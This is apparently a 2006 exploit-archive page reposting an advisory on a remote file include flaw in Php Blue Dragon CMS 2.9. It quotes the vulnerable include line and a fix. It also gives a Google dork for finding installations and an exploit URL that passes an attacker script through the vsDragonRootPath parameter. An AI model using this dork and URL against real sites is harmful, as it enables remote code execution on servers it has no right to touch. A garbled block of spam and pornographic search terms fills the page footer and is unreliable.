about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability




2006-05-12 Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
Rated as : Moderate Risk

################DEVIL TEAM THE BEST POLISH TEAM#################
#Php Blue Dragon Platinum - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#dork: powered by Php Blue Dragon Platinum
################################################################
[code]
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
->
SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]

Fix:
[code]
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
->
SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
securitydot.net - 2006-05-12

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 05:00:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
photoubuck t685t Www.pusy.c www.gdszpw ayesha tak sania mirz www.yuepoc Mms aysha taki www.asspar Hot sex gi optix pro Hot sex gi Www.desiba vediotv sex arbac WW.Pink wo www.sakeel nude pakis fazai.i.ch Cerita Nge Shakiila s Xxx porn a www.44978. Www.bollyw Cerita Nge Shakiila s Xxx porn a www.diping WWW.Sex oc www.2d30.c openmap www.hnshjq fdh wwwlalatx. Manishasex wwwlalatx. Www.untyse c700 www.kannad john the r badjojo,co Www.17+abg daiakuji GET /galle www,porno port 7.htm www.47903. www.okley. Sweet hot